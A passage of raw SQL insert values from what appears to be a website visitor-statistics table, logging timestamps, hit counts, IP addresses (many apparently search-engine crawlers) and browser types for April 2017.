,(102199,1492679332,1,1,0,0,'91.196.178.72','firefox'),(102200,1492679676,1,1,0,0,'91.196.178.71','firefox'),(102201,1492679858,1,1,0,0,'51.255.65.14','other'),(102202,1492679964,1,1,0,0,'37.52.111.76','chrome'),(102203,1492680150,1,1,0,0,'51.255.65.72','other'),(102204,1492680230,1,0,1,0,'66.249.76.107',''),(102205,1492680609,1,1,0,0,'66.249.76.107','chrome'),(102206,1492680666,1,1,0,0,'217.182.132.149','other'),(102207,1492680685,1,1,0,0,'217.182.132.179','other'),(102208,1492680854,1,1,0,0,'178.95.244.45','chrome'),(102209,1492681067,1,1,0,0,'31.43.28.13','chrome'),(102210,1492681913,1,1,0,0,'91.196.178.67','firefox'),(102211,1492682344,1,1,0,0,'178.92.248.177','other'),(102212,1492682613,1,1,0,0,'217.69.136.204','other'),(102213,1492682958,1,1,0,0,'8.29.198.26','other'),(102214,1492683148,1,1,0,0,'217.182.132.179','other'),(102215,1492683296,1,1,0,0,'91.196.178.72','chrome'),(102216,1492683481,1,1,0,0,'164.132.161.92','other'),(102217,1492683680,1,1,0,0,'216.244.66.246','other'),(102218,1492683793,1,0,1,0,'66.249.76.109',''),(102219,1492684018,1,1,0,0,'217.182.132.67','other'),(102220,1492684321,1,1,0,0,'91.229.121.1','chrome'),(102221,1492684651,1,0,1,0,'66.249.66.81',''),(102222,1492684782,1,1,0,0,'91.196.178.72','chrome'),(102223,1492684977,1,0,1,0,'66.249.76.107',''),(102224,1492685065,1,1,0,0,'51.255.71.98','other'),(102225,1492685349,1,1,0,0,'164.132.161.88','other'),(102226,1492686209,1,1,0,0,'130.180.219.142','firefox'),(102227,1492686388,1,1,0,0,'37.9.113.38','other'),(102228,1492686419,1,1,0,0,'178.154.200.45','other'),(102229,1492686639,1,1,0,0,'91.196.179.134','chrome'),(102230,1492686675,1,1,0,0,'164.132.161.58','other'),(102231,1492687068,1,1,0,0,'5.255.253.63','other'),(102232,1492687078,1,1,0,0,'37.9.113.43','other'),(102233,1492687082,1,1,0,0,'141.8.132.72','other'),(102234,1492687109,1,1,0,0,'95.108.213.7','other'),(102235,1492687121,1,1,0,0,'91.196.178.166','chrome'),(102236,1492687160,1,1,0,0,'141.8.142.42','other'),(102237,1492687217,1,1,0,0,'164.132.161.9','other'),(102238,1492687241,1,0,1,0,'66.249.66.87',''),(102239,1492687332,1,1,0,0,'51.255.65.61','other'),(102240,1492687427,1,1,0,0,'213.108.43.94','chrome'),(102241,1492687582,1,1,0,0,'164.132.161.35','other'),(102242,1492687587,1,1,0,0,'141.8.142.164','other'),(102243,1492687614,1,1,0,0,'217.182.132.7','other'),(102244,1492687650,1,1,0,0,'141.8.142.154','other'),(102245,1492687733,1,1,0,0,'95.108.213.34','other'),(102246,1492687873,1,1,0,0,'141.8.142.15','other'),(102247,1492687914,1,1,0,0,'217.182.132.55','other'),(102248,1492688740,3,3,0,0,'141.8.142.164','other'),(102249,1492689079,1,1,0,0,'141.8.142.154','other'),(102250,1492689108,1,1,0,0,'217.182.132.80','other'),(102251,1492689640,1,1,0,0,'217.69.133.234','other'),(102252,1492689954,1,1,0,0,'217.69.133.232','other'),(102253,1492690238,1,1,0,0,'194.187.216.7','chrome'),(102254,1492690331,1,1,0,0,'217.182.132.25','other'),(102255,1492690585,1,1,0,0,'217.182.132.24','other'),(102256,1492690736,1,1,0,0,'91.196.178.130','firefox'),(102257,1492690815,1,1,0,0,'51.255.65.4','other'),(102258,1492691016,1,1,0,0,'94.179.41.160','chrome'),(102259,1492691243,1,1,0,0,'137.74.207.159','other'),(102260,1492691333,1,1,0,0,'66.249.76.28','chrome'),(102261,1492691842,1,1,0,0,'164.132.161.39','other'),(102262,1492692673,1,1,0,0,'217.69.133.224','other'),(102263,1492692862,1,0,1,0,'66.249.76.108',''),(102264,1492693622,1,1,0,0,'217.182.132.66','other'),(102265,1492693762,1,1,0,0,'93.72.240.103','opera'),(102266,1492693763,1,1,0,0,'46.211.204.14','other'),(102267,1492693782,1,1,0,0,'8.29.198.25','other'),(102268,1492693869,1,1,0,0,'176.31.231.10','other'),(102269,1492694142,1,1,0,0,'217.182.132.186','other'),(102270,1492694359,1,1,0,0,'164.132.161.14','other'),(102271,1492695094,1,1,0,0,'217.182.132.53','other'),(102272,1492695244,1,1,0,0,'217.182.132.55','other'),(102273,1492695382,1,1,0,0,'164.132.162.188','other'),(102274,1492695605,1,1,0,0,'82.207.91.234','firefox'),(102275,1492696007,1,1,0,0,'91.196.177.46','firefox'),(102276,1492696363,1,0,1,0,'66.249.76.109',''),(102277,1492696760,1,1,0,0,'91.209.11.236','other'),(102278,1492696867,1,1,0,0,'92.112.224.48','firefox'),(102279,1492697518,1,1,0,0,'95.135.39.123','chrome'),(102280,1492697520,2,2,0,0,'207.46.13.94','other'),(102281,1492697682,1,1,0,0,'164.132.161.23','other'),(102282,1492697721,1,1,0,0,'51.255.65.76','other'),(102283,1492697869,1,1,0,0,'164.132.161.68','other'),(102284,1492698378,1,1,0,0,'164.132.161.75','other'),(102285,1492698482,1,1,0,0,'51.255.65.224','other'),(102286,1492698746,1,1,0,0,'217.69.133.15','other'),(102287,1492699215,1,1,0,0,'66.102.9.22','chrome'),(102288,1492699665,1,1,0,0,'51.255.65.28','other'),(102289,1492699763,1,1,0,0,'217.182.132.175','other'),(102290,1492699800,1,1,0,0,'137.74.207.161','other'),(102291,1492699906,1,1,0,0,'217.182.132.56','other'),(102292,1492700098,1,1,0,0,'217.69.133.10','other'),(102293,1492700370,1,1,0,0,'51.255.65.24','other'),(102294,1492700432,1,1,0,0,'137.74.207.120','other'),(102295,1492700711,1,1,0,0,'180.76.15.31','other'),(102296,1492700717,1,1,0,0,'217.182.132.36','other'),(102297,1492701038,1,1,0,0,'164.132.161.52','other'),(102298,1492701582,1,1,0,0,'207.46.13.95','other'),(102299,1492701905,1,0,1,0,'66.249.76.107',''),(102300,1492702046,1,1,0,0,'164.132.161.60','other'),(102301,1492702359,1,1,0,0,'164.132.161.37','other'),(102302,1492703232,1,1,0,0,'217.182.132.240','other'),(102303,1492703514,1,1,0,0,'95.133.153.78','chrome'),(102304,1492703892,1,1,0,0,'51.255.65.37','other'),(102305,1492704115,1,1,0,0,'88.81.41.57','chrome'),(102306,1492704248,1,1,0,0,'164.132.161.53','other'),(102307,1492704295,1,1,0,0,'207.46.13.14','other'),(102308,1492704558,1,1,0,0,'164.132.161.39','other'),(102309,1492704611,1,1,0,0,'8.29.198.26','other'),(102310,1492704946,1,1,0,0,'66.249.93.156','chrome'),(102311,1492705160,1,1,0,0,'217.69.133.219','other'),(102312,1492705211,1,1,0,0,'164.132.161.34','other'),(102313,1492705239,1,1,0,0,'217.69.133.235','other'),(102314,1492705428,1,1,0,0,'217.182.132.178','other'),(102315,1492706103,1,1,0,0,'46.201.113.242','chrome'),(102316,1492706296,1,1,0,0,'51.255.65.46','other'),(102317,1492706419,1,1,0,0,'66.249.93.204','chrome'),(102318,1492706495,1,1,0,0,'217.182.132.188','other'),(102319,1492707009,1,1,0,0,'141.8.142.154','other'),(102320,1492707010,1,1,0,0,'141.8.142.164','other'),(102322,1492707336,2,2,0,0,'212.252.56.179','other'),(102323,1492707963,1,1,0,0,'51.255.65.69','other'),(102324,1492708249,1,1,0,0,'51.255.65.59','other'),(102325,1492708340,1,1,0,0,'51.255.65.41','other'),(102326,1492708419,1,1,0,0,'51.255.65.31','other'),(102327,1492708446,1,1,0,0,'164.132.161.89','other'),(102328,1492708447,1,1,0,0,'51.255.65.82','other'),(102329,1492709320,1,0,1,0,'66.249.66.97',''),(102330,1492709425,1,1,0,0,'217.182.132.179','other'),(102331,1492709794,1,1,0,0,'93.78.251.123','chrome'),(102332,1492709816,1,1,0,0,'51.255.65.19','other'),(102333,1492710260,1,1,0,0,'217.69.133.250','other'),(102334,1492710295,1,1,0,0,'164.132.161.50','other'),(102335,1492710391,1,1,0,0,'51.255.65.36','other'),(102336,1492712346,1,1,0,0,'193.194.127.217','firefox'),(102337,1492712864,1,1,0,0,'217.69.133.11','other'),(102338,1492713048,1,1,0,0,'91.196.178.167','chrome'),(102339,1492713144,1,0,1,0,'66.249.66.177',''),(102340,1492713827,2,2,0,0,'216.244.66.233','other'),(102341,1492714252,1,1,0,0,'51.255.65.37','other'),(102342,1492714878,1,1,0,0,'23.101.61.176','other'),(102343,1492714958,1,1,0,0,'217.182.132.58','other'),(102344,1492715128,1,1,0,0,'92.113.189.4','chrome'),(102345,1492715438,1,1,0,0,'8.29.198.26','other'),(102346,1492716442,1,1,0,0,'217.182.132.30','other'),(102347,1492716951,1,1,0,0,'217.69.133.246','other'),(102348,1492717146,1,1,0,0,'217.69.133.15','other'),(102349,1492717323,1,1,0,0,'217.182.132.79','other'),(102350,1492719573,1,1,0,0,'217.182.132.157','other'),(102351,1492719583,1,1,0,0,'164.132.162.188','other'),(102352,1492720060,1,1,0,0,'217.182.132.67','other'),(102353,1492721082,1,1,0,0,'207.46.13.82','other'),(102354,1492721180,1,1,0,0,'164.132.161.77','other'),(102355,1492721564,1,1,0,0,'217.69.133.224','other'),(102356,1492721600,1,1,0,0,'217.69.133.4','other'),(102357,1492721959,1,1,0,0,'217.182.132.148','other'),(102358,1492722013,1,1,0,0,'217.182.132.67','other'),(102359,1492722345,1,1,0,0,'164.132.162.160','other'),(102360,1492722623,1,1,0,0,'188.162.65.52','firefox'),(102361,1492722627,1,1,0,0,'188.162.65.52','chrome'),(102362,1492722975,1,1,0,0,'51.255.65.90','other'),(102363,1492723229,1,1,0,0,'216.244.66.237','other'),(102364,1492723234,1,1,0,0,'40.77.167.4','other'),(102365,1492723633,1,1,0,0,'164.132.161.97','other'),(102366,1492723942,1,1,0,0,'51.255.65.55','other'),(102367,1492723994,1,1,0,0,'164.132.161.2','other'),(102368,1492725195,1,1,0,0,'217.69.133.191','other'),(102369,1492725280,1,1,0,0,'164.132.161.83','other'),(102370,1492725337,1,1,0,0,'217.69.133.235','other'),(102371,1492726068,1,1,0,0,'164.132.161.71','other'),(102372,1492726101,1,1,0,0,'51.255.65.51','other'),(102373,1492726272,1,1,0,0,'8.29.198.25','other'),(102374,1492726350,1,1,0,0,'164.132.161.10','other'),(102375,1492726836,1,1,0,0,'217.182.132.88','other'),(102376,1492726903,1,1,0,0,'216.244.66.237','other'),(102377,1492727359,1,1,0,0,'207.46.13.82','other'),(102378,1492727617,1,1,0,0,'217.182.132.35','other'),(102379,1492727843,1,1,0,0,'164.132.161.36','other'),(102380,1492728485,1,1,0,0,'217.69.133.4','other'),(102381,1492729144,1,1,0,0,'51.255.65.78','other'),(102382,1492729846,1,1,0,0,'51.255.71.112','other'),(102383,1492730228,1,0,1,0,'207.46.13.82',''),(102384,1492730567,1,1,0,0,'51.255.65.82','other'),(102385,1492730579,1,1,0,0,'51.255.71.119','other'),(102386,1492731449,1,1,0,0,'217.182.132.95','other'),(102387,1492731543,1,1,0,0,'164.132.161.18','other'),(102388,1492731686,1,1,0,0,'217.182.132.56','other'),(102389,1492731729,1,1,0,0,'217.69.133.3','other'),(102390,1492731939,1,1,0,0,'180.76.15.147','other'),(102391,1492732048,1,1,0,0,'217.69.133.59','other'),(102392,1492732611,1,1,0,0,'51.255.65.29','other'),(102393,1492732664,1,1,0,0,'51.255.71.114','other'),(102394,1492732836,1,1,0,0,'217.182.132.50','other'),(102395,1492732991,1,1,0,0,'217.182.132.154','other'),(102396,1492733028,1,1,0,0,'164.132.161.76','other'),(102397,1492733237,1,1,0,0,'51.255.65.69','other'),(102398,1492733444,1,0,1,0,'66.249.76.29',''),(102399,1492733660,1,1,0,0,'157.55.39.70','other'),(102400,1492734344,1,1,0,0,'207.46.13.28','other'),(102401,1492734529,2,2,0,0,'144.76.56.44','other'),(102402,1492734546,1,1,0,0,'51.255.71.110','other'),(102403,1492734765,1,1,0,0,'51.255.65.42','other'),(102404,1492734767,1,0,1,0,'66.249.66.177',''),(102405,1492734928,1,1,0,0,'51.255.65.62','other'),(102406,1492735232,1,1,0,0,'164.132.161.83','other'),(102407,1492735701,1,1,0,0,'164.132.161.76','other'),(102408,1492735836,1,1,0,0,'217.69.133.10','other'),(102409,1492736061,1,1,0,0,'137.74.207.161','other'),(102410,1492736143,1,1,0,0,'164.132.161.56','other'),(102411,1492736500,1,1,0,0,'51.255.71.112','other'),(102412,1492736570,1,1,0,0,'51.255.65.61','other'),(102413,1492737101,1,1,0,0,'8.29.198.27','other'),(102414,1492737714,1,1,0,0,'164.132.161.23','other'),(102415,1492737842,1,1,0,0,'137.74.203.194','other'),(102416,1492738249,1,1,0,0,'164.132.162.153','other'),(102417,1492738609,1,0,1,0,'157.55.39.251',''),(102418,1492739309,1,1,0,0,'51.255.71.117','other'),(102419,1492739768,1,1,0,0,'5.167.124.58','msie'),(102420,1492740191,1,1,0,0,'216.244.66.237','other'),(102421,1492740267,1,1,0,0,'137.74.207.188','other'),(102422,1492740335,1,1,0,0,'164.132.161.91','other'),(102423,1492740579,1,1,0,0,'51.255.65.7','other'),(102424,1492741205,1,1,0,0,'51.255.65.224','other'),(102425,1492741291,1,1,0,0,'164.132.161.25','other'),(102426,1492741395,1,1,0,0,'217.69.133.220','other'),(102427,1492741474,1,1,0,0,'51.255.65.5','other'),(102428,1492741603,1,1,0,0,'137.74.207.161','other'),(102429,1492741837,1,1,0,0,'51.255.65.11','other'),(102430,1492742327,1,1,0,0,'164.132.161.70','other'),(102431,1492742632,1,1,0,0,'95.108.213.34','other'),(102432,1492742644,2,2,0,0,'5.255.253.63','other'),(102433,1492742649,1,1,0,0,'141.8.142.154','other'),(102434,1492742662,1,1,0,0,'141.8.142.164','other'),(102435,1492742666,1,1,0,0,'95.108.179.15','other'),(102436,1492742806,1,1,0,0,'51.255.65.17','other'),(102437,1492742949,1,1,0,0,'164.132.162.153','other'),(102438,1492742994,1,1,0,0,'51.255.65.29','other'),(102439,1492743694,1,1,0,0,'141.8.142.154','other'),(102440,1492743758,1,1,0,0,'95.108.179.15','other'),(102441,1492743769,1,1,0,0,'5.255.253.81','other'),(102442,1492743772,1,1,0,0,'95.108.213.34','other'),(102443,1492746299,1,1,0,0,'51.255.65.6','other'),(102444,1492746696,1,1,0,0,'82.145.221.42','other'),(102445,1492746807,1,1,0,0,'51.255.65.73','other'),(102446,1492746898,1,1,0,0,'82.145.221.42','chrome'),(102447,1492746900,1,1,0,0,'82.145.221.42','opera'),(102448,1492747171,1,1,0,0,'164.132.161.33','other'),(102449,1492747301,1,1,0,0,'217.69.133.236','other'),(102450,1492747321,1,1,0,0,'51.255.65.64','other'),(102451,1492747493,1,1,0,0,'51.255.65.34','other'),(102452,1492747934,1,1,0,0,'8.29.198.25','other'),(102453,1492747991,1,0,1,0,'66.249.76.107',''),(102454,1492748033,1,1,0,0,'216.244.66.237','other'),(102455,1492748906,1,1,0,0,'217.182.132.56','other'),(102456,1492749032,1,1,0,0,'51.255.71.115','other'),(102457,1492749036,1,1,0,0,'51.255.65.224','other'),(102458,1492749254,1,1,0,0,'217.69.133.251','other'),(102459,1492749329,1,1,0,0,'217.182.132.172','other'),(102460,1492749621,1,1,0,0,'217.182.132.75','other'),(102461,1492749812,1,1,0,0,'91.196.178.71','firefox'),(102462,1492750391,1,1,0,0,'109.63.168.18','msie'),(102463,1492750797,1,1,0,0,'216.244.66.237','other'),(102464,1492751494,1,1,0,0,'188.32.176.246','msie'),(102465,1492751925,1,1,0,0,'51.255.71.115','other'),(102466,1492752018,1,1,0,0,'93.80.144.131','msie'),(102467,1492752024,1,0,1,0,'66.249.76.27',''),(102468,1492752123,1,1,0,0,'217.182.132.171','other'),(102469,1492752242,1,1,0,0,'51.255.65.41','other'),(102470,1492752680,1,1,0,0,'176.195.108.213','msie'),(102471,1492752873,1,1,0,0,'217.182.132.55','other'),(102472,1492753037,1,1,0,0,'217.182.132.187','other'),(102473,1492753185,1,0,1,0,'66.249.66.180',''),(102474,1492753698,1,1,0,0,'51.255.65.25','other'),(102475,1492754062,1,1,0,0,'217.69.133.249','other'),(102476,1492754155,1,1,0,0,'217.182.132.192','other'),(102477,1492754237,1,0,1,0,'66.249.66.180',''),(102478,1492754440,1,0,1,0,'66.249.76.29',''),(102479,1492755253,1,1,0,0,'51.255.71.101','other'),(102480,1492755310,1,1,0,0,'91.196.177.46','firefox'),(102481,1492755460,1,0,1,0,'66.249.76.109',''),(102482,1492755804,1,1,0,0,'130.180.216.239','firefox'),(102483,1492755868,1,1,0,0,'51.255.65.21','other'),(102484,1492755871,1,1,0,0,'37.52.21.137','chrome'),(102485,1492755999,1,1,0,0,'217.182.132.57','other'),(102486,1492756057,1,0,1,0,'66.249.76.107',''),(102487,1492756179,2,1,1,0,'207.46.13.42',''),(102488,1492756233,1,1,0,0,'207.46.13.43','other'),(102489,1492756649,1,1,0,0,'178.92.171.23','chrome'),(102490,1492756667,1,1,0,0,'91.196.178.72','chrome'),(102491,1492756990,1,1,0,0,'51.255.65.11','other'),(102492,1492756992,1,1,0,0,'164.132.161.46','other'),(102493,1492757215,1,1,0,0,'217.182.132.27','other'),(102494,1492757479,1,1,0,0,'91.196.178.65','firefox'),(102495,1492757612,1,1,0,0,'164.132.161.39','other'),(102496,1492757729,1,1,0,0,'91.196.178.69','chrome'),(102497,1492757834,1,1,0,0,'51.255.65.90','other'),(102498,1492758319,1,1,0,0,'217.182.132.73','other'),(102499,1492758589,1,1,0,0,'37.52.21.137','firefox'),(102500,1492758767,1,1,0,0,'8.29.198.25','other'),(102501,1492758972,1,1,0,0,'213.186.202.241','chrome'),(102502,1492758984,2,2,0,0,'5.9.111.70','other'),(102503,1492759622,1,1,0,0,'82.207.91.234','firefox'),(102504,1492759756,1,1,0,0,'51.255.65.12','other'),(102505,1492759843,1,1,0,0,'91.196.177.46','firefox'),(102506,1492760688,1,1,0,0,'91.196.178.71','chrome'),(102507,1492760779,1,1,0,0,'51.255.65.77','other'),(102508,1492761002,1,1,0,0,'217.182.132.58','other'),(102509,1492761015,1,1,0,0,'51.255.65.48','other'),(102510,1492761374,1,1,0,0,'66.249.93.155','chrome'),(102511,1492761804,1,1,0,0,'217.182.132.50','other'),(102512,1492762183,1,1,0,0,'51.255.71.118','other'),(102513,1492762842,2,2,0,0,'91.196.178.72','firefox'),(102514,1492763755,2,2,0,0,'207.46.13.43','other'),(102515,1492763957,1,1,0,0,'91.196.178.69','firefox'),(102516,1492764412,1,1,0,0,'217.182.132.90','other'),(102517,1492764456,1,1,0,0,'217.69.133.242','other'),(102518,1492764695,1,1,0,0,'217.182.132.5','other'),(102519,1492764843,1,1,0,0,'217.182.132.152','other'),(102520,1492764881,1,1,0,0,'217.182.132.14','other'),(102521,1492765583,1,1,0,0,'217.182.132.66','other'),(102522,1492765972,2,2,0,0,'216.244.66.237','other'),(102523,1492766303,1,1,0,0,'207.46.13.41','other'),(102524,1492766490,1,1,0,0,'217.69.133.215','other'),(102525,1492766550,1,1,0,0,'91.213.33.174','firefox'),(102526,1492766576,1,1,0,0,'178.154.149.1','other'),(102527,1492766843,1,1,0,0,'137.74.207.109','other'),(102528,1492766907,1,1,0,0,'217.182.132.59','other'),(102529,1492767024,1,1,0,0,'164.132.162.153','other'),(102530,1492767126,1,1,0,0,'91.196.178.72','msie'),(102531,1492767412,2,2,0,0,'46.4.91.109','other'),(102532,1492767465,1,1,0,0,'217.182.132.17','other'),(102533,1492767492,1,1,0,0,'46.161.9.30','chrome'),(102534,1492767934,1,1,0,0,'164.132.161.77','other'),(102535,1492768083,1,1,0,0,'164.132.161.48','other'),(102536,1492768535,1,1,0,0,'91.196.178.71','firefox'),(102537,1492768703,1,1,0,0,'217.182.132.80','other'),(102538,1492768903,1,1,0,0,'37.53.231.116','chrome'),(102539,1492768942,1,1,0,0,'66.102.9.22','chrome'),(102540,1492768950,1,1,0,0,'164.132.161.30','other'),(102541,1492769012,1,1,0,0,'51.255.65.51','other'),(102542,1492769590,1,1,0,0,'8.29.198.26','other'),(102543,1492769657,1,0,1,0,'66.249.66.183',''),(102544,1492769668,1,1,0,0,'94.179.124.103','chrome'),(102545,1492770154,1,1,0,0,'51.255.65.89','other'),(102546,1492770344,1,1,0,0,'164.132.161.96','other'),(102547,1492770893,1,1,0,0,'176.193.173.250','msie'),(102548,1492770894,1,1,0,0,'188.244.46.138','msie'),(102549,1492770895,1,1,0,0,'109.173.60.189','msie'),(102550,1492770905,1,1,0,0,'217.69.133.248','other'),(102551,1492771038,1,1,0,0,'217.69.133.29','other'),(102552,1492771179,1,1,0,0,'164.132.161.47','other'),(102553,1492771338,1,1,0,0,'51.255.65.47','other'),(102554,1492771772,1,1,0,0,'164.132.161.29','other'),(102555,1492771820,1,1,0,0,'51.255.65.45','other'),(102556,1492771924,1,1,0,0,'66.249.76.108','chrome'),(102557,1492772775,1,1,0,0,'151.80.27.116','other'),(102558,1492772810,1,1,0,0,'51.255.65.26','other'),(102559,1492772861,1,1,0,0,'193.53.83.20','firefox'),(102560,1492772913,2,0,2,0,'66.249.76.29',''),(102561,1492772971,2,2,0,0,'77.52.12.186','firefox'),(102562,1492773235,1,0,1,0,'66.249.66.81',''),(102563,1492773315,1,1,0,0,'217.69.133.67','other'),(102564,1492773412,1,1,0,0,'91.196.177.26','chrome'),(102565,1492773575,1,0,1,0,'66.249.76.28',''),(102566,1492773578,1,1,0,0,'164.132.161.90','other'),(102567,1492773623,1,1,0,0,'180.76.15.156','other'),(102568,1492773726,1,1,0,0,'217.69.133.224','other'),(102569,1492774429,2,2,0,0,'207.46.13.41','other'),(102570,1492774472,2,2,0,0,'216.244.66.237','other'),(102571,1492774609,1,1,0,0,'217.182.132.36','other'),(102572,1492775026,1,0,1,0,'66.249.66.183',''),(102573,1492775151,1,1,0,0,'91.196.177.26','chrome'),(102574,1492775203,1,1,0,0,'62.122.67.11','chrome'),(102575,1492775251,1,1,0,0,'217.182.132.193','other'),(102576,1492775365,1,1,0,0,'77.222.134.100','firefox'),(102577,1492775961,1,0,1,0,'66.249.76.27',''),(102578,1492776046,1,1,0,0,'46.201.174.183','chrome'),(102579,1492776186,1,1,0,0,'37.53.230.195','chrome'),(102580,1492776554,1,1,0,0,'217.182.132.81','other'),(102581,1492776677,2,2,0,0,'91.196.178.69','firefox'),(102582,1492776725,1,1,0,0,'51.255.65.24','other'),(102583,1492776886,1,1,0,0,'217.182.132.36','other'),(102584,1492776976,1,1,0,0,'51.255.71.130','other'),(102585,1492777028,1,1,0,0,'51.255.65.89','other'),(102586,1492777186,1,1,0,0,'217.182.132.55','other'),(102587,1492777468,1,1,0,0,'194.1.195.225','msie'),(102588,1492777559,1,1,0,0,'195.10.210.49','chrome'),(102589,1492777582,1,1,0,0,'164.132.161.83','other'),(102590,1492777994,1,1,0,0,'51.255.65.34','other'),(102591,1492778845,1,1,0,0,'194.1.195.225','msie'),(102592,1492778850,1,1,0,0,'95.108.179.8','other'),(102593,1492778853,1,1,0,0,'5.255.253.43','other'),(102594,1492779000,1,0,1,0,'66.249.76.29',''),(102595,1492779223,1,1,0,0,'151.80.27.116','other'),(102596,1492779263,1,1,0,0,'66.249.76.108','chrome'),(102597,1492779314,1,1,0,0,'66.249.66.81','chrome'),(102598,1492779485,1,1,0,0,'195.10.210.49','chrome'),(102599,1492779739,1,1,0,0,'207.46.13.41','other'),(102600,1492780220,1,1,0,0,'157.55.39.47','other'),(102601,1492780423,1,1,0,0,'8.29.198.25','other'),(102602,1492780777,1,1,0,0,'51.255.71.111','other'),(102603,1492781051,1,1,0,0,'91.196.178.70','firefox'),(102604,1492781297,1,1,0,0,'130.180.216.254','opera'),(102605,1492781306,1,1,0,0,'164.132.161.43','other'),(102606,1492781390,1,1,0,0,'51.255.65.55','other'),(102607,1492781657,1,1,0,0,'130.180.219.253','chrome'),(102608,1492781734,1,1,0,0,'51.255.65.89','other'),(102609,1492781771,1,1,0,0,'164.132.161.30','other'),(102610,1492782267,1,1,0,0,'54.165.59.7','other'),(102611,1492782400,1,0,1,0,'66.249.76.108',''),(102612,1492783077,1,1,0,0,'164.132.161.56','other'),(102613,1492783215,2,2,0,0,'54.165.59.7','other'),(102614,1492783404,1,1,0,0,'164.132.161.41','other'),(102615,1492783457,1,1,0,0,'146.185.223.121','chrome'),(102616,1492783790,1,1,0,0,'66.102.9.40','chrome'),(102617,1492783927,1,1,0,0,'91.196.178.34','chrome'),(102618,1492783944,1,1,0,0,'141.8.142.97','other'),(102619,1492784592,1,1,0,0,'146.185.223.121','chrome'),(102620,1492785949,1,1,0,0,'130.180.216.36','opera'),(102621,1492786755,1,0,1,0,'207.46.13.42',''),(102622,1492788628,1,1,0,0,'217.69.136.207','other'),(102623,1492789560,1,0,1,0,'66.249.76.29',''),(102624,1492790474,1,1,0,0,'31.184.197.41','chrome'),(102625,1492791250,1,1,0,0,'8.29.198.26','other'),(102626,1492791299,1,1,0,0,'91.196.178.40','firefox'),(102627,1492791513,1,1,0,0,'217.69.133.234','other'),(102628,1492792865,1,0,1,0,'66.249.66.177',''),(102629,1492793541,1,1,0,0,'66.249.93.204','chrome'),(102630,1492793648,1,1,0,0,'180.76.15.22','other'),(102631,1492794016,1,1,0,0,'91.196.178.67','chrome'),(102632,1492794474,2,2,0,0,'216.244.66.237','other'),(102633,1492796280,2,1,1,0,'66.249.76.29',''),(102634,1492797836,1,1,0,0,'217.182.132.28','other'),(102635,1492797893,1,1,0,0,'51.255.65.16','other'),(102636,1492798245,1,1,0,0,'51.255.65.54','other'),(102637,1492798612,1,1,0,0,'164.132.161.28','other'),(102638,1492798615,1,1,0,0,'51.255.65.18','other'),(102639,1492798923,1,1,0,0,'217.182.132.28','other'),(102640,1492799152,1,0,1,0,'66.249.76.29',''),(102641,1492799368,1,1,0,0,'164.132.161.73','other'),(102642,1492799497,1,0,1,0,'66.249.76.107',''),(102643,1492799632,1,0,1,0,'66.249.76.108',''),(102644,1492799906,1,1,0,0,'130.180.219.191','opera'),(102645,1492800028,1,1,0,0,'180.76.15.154','other'),(102646,1492800615,1,1,0,0,'217.182.132.64','other'),(102647,1492800649,1,1,0,0,'51.255.65.12','other'),(102648,1492801018,1,1,0,0,'216.244.66.237','other'),(102649,1492801097,1,1,0,0,'217.182.132.177','other'),(102650,1492801122,1,1,0,0,'164.132.161.88','other'),(102651,1492801152,1,1,0,0,'51.255.65.35','other'),(102652,1492802076,1,1,0,0,'8.29.198.25','other'),(102653,1492802124,1,0,1,0,'66.249.66.81',''),(102654,1492802239,1,1,0,0,'178.92.170.188','chrome'),(102655,1492802411,1,1,0,0,'217.69.133.84','other'),(102656,1492802514,1,1,0,0,'217.69.133.30','other'),(102657,1492802635,1,1,0,0,'164.132.161.23','other'),(102658,1492803452,1,1,0,0,'164.132.161.71','other'),(102659,1492803507,1,1,0,0,'216.244.66.237','other'),(102660,1492803822,1,1,0,0,'164.132.161.83','other'),(102661,1492803992,1,1,0,0,'51.255.71.113','other'),(102662,1492804386,1,1,0,0,'66.249.76.27','chrome'),(102663,1492804459,1,1,0,0,'164.132.161.29','other'),(102664,1492804476,1,1,0,0,'51.255.71.126','other'),(102665,1492805183,1,1,0,0,'95.108.179.8','other'),(102666,1492805320,1,1,0,0,'51.255.65.22','other'),(102667,1492805523,1,1,0,0,'51.255.65.11','other'),(102668,1492805576,1,1,0,0,'217.182.132.86','other'),(102669,1492806987,1,1,0,0,'217.182.132.64','other'),(102670,1492807883,1,1,0,0,'51.255.71.114','other'),(102671,1492808663,1,1,0,0,'164.132.161.66','other'),(102672,1492808867,1,1,0,0,'164.132.161.28','other'),(102673,1492808897,1,1,0,0,'51.255.71.114','other'),(102674,1492809259,1,1,0,0,'207.46.13.42','other'),(102675,1492810275,1,1,0,0,'51.255.65.37','other'),(102676,1492810366,1,1,0,0,'217.182.132.96','other'),(102677,1492810848,1,1,0,0,'217.69.133.227','other'),(102678,1492811792,1,1,0,0,'217.182.132.95','other'),(102679,1492811911,1,1,0,0,'217.182.132.77','other'),(102680,1492812918,1,1,0,0,'8.29.198.26','other'),(102681,1492813192,1,1,0,0,'217.182.132.97','other'),(102682,1492813958,1,1,0,0,'217.182.132.75','other'),(102683,1492814295,1,1,0,0,'217.69.133.245','other'),(102684,1492814853,1,1,0,0,'54.165.59.7','other'),(102685,1492815501,1,1,0,0,'51.255.65.42','other'),(102686,1492816159,1,1,0,0,'51.255.65.3','other'),(102687,1492816174,1,0,1,0,'66.249.66.81',''),(102688,1492816338,1,0,1,0,'207.46.13.41',''),(102689,1492816450,1,1,0,0,'180.76.15.156','other'),(102690,1492817041,1,1,0,0,'164.132.161.10','other'),(102691,1492817296,1,1,0,0,'178.140.62.243','msie'),(102692,1492817534,1,1,0,0,'164.132.161.49','other'),(102693,1492818254,1,1,0,0,'51.255.71.127','other'),(102694,1492818534,1,1,0,0,'51.255.65.90','other'),(102695,1492818662,1,1,0,0,'217.182.132.172','other'),(102696,1492819058,1,1,0,0,'66.249.76.29','chrome'),(102697,1492819633,1,1,0,0,'51.255.71.120','other'),(102698,1492819738,1,0,1,0,'157.55.39.47',''),(102699,1492820420,1,1,0,0,'217.69.136.209','other'),(102700,1492820666,1,1,0,0,'51.255.65.70','other'),(102701,1492821019,1,0,1,0,'66.249.66.180',''),(102702,1492821112,1,1,0,0,'217.182.132.6','other'),(102703,1492821999,1,1,0,0,'164.132.162.155','other'),(102704,1492822210,1,1,0,0,'137.74.207.101','other'),(102705,1492822638,1,1,0,0,'164.132.161.31','other'),(102706,1492822799,1,1,0,0,'164.132.162.153','other'),(102707,1492823078,1,1,0,0,'207.46.13.43','other'),(102708,1492823653,1,1,0,0,'217.182.132.28','other'),(102709,1492823758,1,1,0,0,'8.29.198.26','other'),(102710,1492823836,1,1,0,0,'51.255.65.31','other'),(102711,1492824057,1,1,0,0,'164.132.161.7','other'),(102712,1492824477